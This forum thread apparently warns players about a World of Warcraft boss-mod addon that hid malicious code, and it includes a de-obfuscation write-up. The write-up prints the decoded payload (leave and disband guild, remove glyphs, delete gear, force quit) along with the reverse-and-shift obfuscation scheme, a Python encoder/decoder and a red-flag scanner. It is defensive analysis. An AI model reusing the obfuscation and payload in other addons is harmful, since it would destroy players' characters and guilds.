Content of this thread has been removed. If you have installed the addon contained previously in this post, remove it immediately. It contains malicious code designed to harm your WoW characters.
- Proterean
Content of this thread has been removed. If you have installed the addon contained previously in this post, remove it immediately. It contains malicious code designed to harm your WoW characters. The author of this addon will be extensively punished by permanent ban on all of his accounts.
The addon will attempt to delete your gear, glyphs, disband your guild and leave the party mid-fight. This code is triggered only when playing on Frostmourne and a certain boss in Ulduar is engaged.
We have rendered the addon unusable in-game.
What about side effects? Could it be that the modified version of the addon introduced malicious code somewhere else?
Addons are sandboxed, they cannot do anything outside of the WoW client.
Would it be alright to post a fixed version removing the malicious bits?
Little write-up on the Frostmourne DBM addon explaining the "how" for those interested.
tldr:
Yes - the boss was Algalon, where entering Big Bang Phase would make you leave party, leave guild, disband it if possible, remove glyphs (xd!), delete wep and offhand (slots 16&18) and finally force quit the game (bypassing the 20sec countdown).
Uninstall this addon version and you're good to go.
long:
Comparing the changes made to the default 3.3.5a DBM version quickly hints at the seeming effort to "fix" a phasing-related issue at Algalon when in the Big Bang "room" in DBM-Ulduar/Algalon.lua.
https://i.imgur.com/P4nCfhc.jpg
Looking at the DBM-Core.lua file, there's an added check if the player is phased.
https://i.imgur.com/8Y0UwWf.jpg
The function isInPhase calls CacheData, which itself calls another two functions.
The RunScript function here (without even having to look at the input) is a huge red flag and heavily suggests maliciousness, as most addons just Get/Set/Hook event or update handlers.
https://i.imgur.com/pb4Z6ob.jpg
The first called function is GetMemoryLocations(), second Map().
CacheData checks if the RealmName equals the (obfuscated) "Frostmourne", and calls the two aforementioned functions under that condition.
Let's now dive into the obfuscated part:
DBM:Map("irvysqxwsvJ", 11, data)
"irvysqxwsvJ" gets handled by Map using the number of characters (the function's second input, here: v=11) and data.
https://i.imgur.com/aGT5Wyo.jpg
out = out..string.char(tonumber(string.byte(k,-l))-o)
This part reverses the string by (for-)looping through "irvysqxwsvJ" from the last entry to the first entry.
v = 11
l = -v
for l = -v, -1
for l = -11, -1 do ... end [equiv: for (int l = -11; l <= -1; l++) ]
string.byte(k,-l) then takes the 11th (last) char of the string k in the first loop, here: J
then:
J (here: index -l of input k) is turned into its ASCII code 74; as a number (tonumber) it then has 4 subtracted ("-o", with o being data=4), giving 70, which string.char turns back into a letter again: F.
The loop then goes to the 10th entry, string.byte(k,-l-1), and does the same, and so on.
in general:
A whole string shifted by a static integer is essentially the Caesar cipher. Putting the whole (now reversed) string "Jvswxqsyvri" into a decoder with offset 4, we get "Frostmourne".
https://i.imgur.com/rDMxSQe.jpg
Now we can simply put all the string literals called by GetMemoryLocations() into the decoder as well.
https://i.imgur.com/1gzJdge.jpg
which decode to:
GuildLeave
GuildDisband
for i=1,6 do RemoveGlyphFromSocket(i) end
for P=16,18 do PickupInventoryItem(P) DeleteCursorItem() end
LeaveParty
ForceQuit
CLARIFICATIONS
______________
The function(s) ONLY get called when at Algalon and in Big Bang phase (when playing on Frostmourne).
Deleting this DBM version is enough, no need for a fresh install or other panic moves of that sort.
If proficient enough, just delete the adjusted Algalon and phasing parts and you're good to go.
___
props to (guessing) midna for finding that; I just broke it down for those interested
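As an added example (not code from the thread, the addon, or DBM), here is a Python reimplementation of the Map routine described above, its inverse, and a small scanner that pulls every DBM:Map("...", n, data) literal out of a Lua source file and decodes it. Only the literal "irvysqxwsvJ" and the offset 4 come from the post; the sample Lua snippet is constructed here, with its payload strings produced by the encoder so the scanner has something to find. The regex and the red-flag list are my assumptions, not anything the addon defines.

```python
import re

# Offset recovered in the write-up: CacheData passes data = 4 into DBM:Map.
SHIFT = 4


def map_decode(k: str, v: int, o: int = SHIFT) -> str:
    """Python equivalent of the addon's Map(k, v, o).

    Mirrors the Lua loop
        for l = -v, -1 do out = out .. string.char(string.byte(k, -l) - o) end
    string.byte(k, -l) is 1-indexed, so -l = v, v-1, ..., 1 walks the string
    backwards; each byte is then shifted down by o. Reverse + fixed byte shift
    is the whole "cipher". It is a raw byte shift, not an alphabet-wrapping
    Caesar, so digits, spaces and punctuation shift too.
    """
    if v > len(k):
        raise ValueError("v exceeds string length")  # string.byte would yield nil in Lua
    out = ""
    for l in range(-v, 0):            # Lua: for l = -v, -1
        out += chr(ord(k[-l - 1]) - o)  # Lua index -l (1-based) -> Python -l - 1
    return out


def map_encode(plain: str, o: int = SHIFT) -> str:
    """Inverse of map_decode: shift each byte up by o, then reverse."""
    return "".join(chr(ord(c) + o) for c in reversed(plain))


# Assumed call shape, matching the DBM:Map("irvysqxwsvJ", 11, data) line in the post.
CALL_RE = re.compile(r'DBM:Map\(\s*"([^"]*)"\s*,\s*(\d+)\s*,\s*(\w+)\s*\)')

# Assumed watch list: APIs that a boss-mod addon has no business calling.
RED_FLAGS = ("RunScript", "loadstring", "DeleteCursorItem", "GuildDisband", "ForceQuit")


def decode_calls(lua_source: str, o: int = SHIFT) -> list:
    """Return (literal, decoded) pairs for every DBM:Map("...", n, data) call."""
    return [(lit, map_decode(lit, int(n), o)) for lit, n, _ in CALL_RE.findall(lua_source)]


def red_flags(lua_source: str, o: int = SHIFT) -> list:
    """Names from RED_FLAGS found in cleartext or inside decoded Map literals, sorted."""
    text = lua_source + "\n".join(d for _, d in decode_calls(lua_source, o))
    return sorted(f for f in RED_FLAGS if f in text)


def _map_call(plain: str) -> str:
    """Render a DBM:Map(...) call carrying map_encode(plain), for the constructed sample."""
    return f'DBM:Map("{map_encode(plain)}", {len(plain)}, data)'


# Constructed sample, NOT the real DBM-Core.lua. Only "irvysqxwsvJ" comes from the post.
SAMPLE_LUA = "\n".join([
    "local data = 4",
    'if GetRealmName() == DBM:Map("irvysqxwsvJ", 11, data) then',
    f"  RunScript({_map_call('GuildDisband')})",
    f"  RunScript({_map_call('for P=16,18 do PickupInventoryItem(P) DeleteCursorItem() end')})",
    "end",
])


if __name__ == "__main__":
    for lit, plain in decode_calls(SAMPLE_LUA):
        print(f"{lit!r} -> {plain!r}")
    print("red flags:", red_flags(SAMPLE_LUA))
```

The offset is the only unknown when you meet a variant of this; since the realm-name comparison has to decode to a real realm name, trying offsets until the first literal turns into readable text recovers `o` immediately, after which every other literal falls out with the same call.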
Good stuff. Thanks for the awesome write up, but as I'm sure many people will probably be asking, and looking for, do you think you can make said version without the malicious coding?
Edit: On second thought it'd be pretty great if BlueAo could look into making a version for his improved + enhanced warmane thread http://forum.warmane.com/showthread.php?t=412904 or something similar.
Appreciate the time people spent catching this before it caused any true damage though.
Mad props to the guy who thought "Hmmm, a new addon? Better check it out if there is anything funky aboot..."
Correct.
Great breakdown!
It wasn't me who initially found it actually, I merely de-obfuscated and confirmed the case, much like you did.
The original repository got deleted pretty quickly by the owner after we noticed what was going on.
I hope this is a reminder to everyone to not just install anything you find on the internet onto your computer, even if it's just something seemingly harmless like an add-on for a game.
I haven't downloaded this addon, but I would like to say this - big thanks for the warning. To all of you, in fact. It's kinda frightening how a seemingly harmless addon that offers QoL features could contain malicious code and catch someone off guard. I would like to ask a question - how was the malicious code found? Did a random user check the code and decide to contact the staff, or does the staff check user-made addons that are shared on the site?
Great advice!
[edit] I have to admit that OP had a sense of humor. I am not defending them, nor am I saying that I find it funny, but it's fitting - imagine playing against Algalon and Big Bang occurs. All of a sudden, your game closes - you probably see a black screen before going to the desktop - you log back in and find yourself without a guild, gear and glyphs. The realisation of how screwed you got would have hit you like a "big bang". The "joke" breaks the fourth wall, if you think about it. What a twisted prank that would have been!
Respect to the dev who found it!
Might be unrelated, but today when raiding I couldn't see any /rw text in the middle of my screen, and all DBM text (not this guy's...) was entirely black. Does this have to do with it? And how do I fix it? Already reopened the game, cleared the cache, nothing solves it.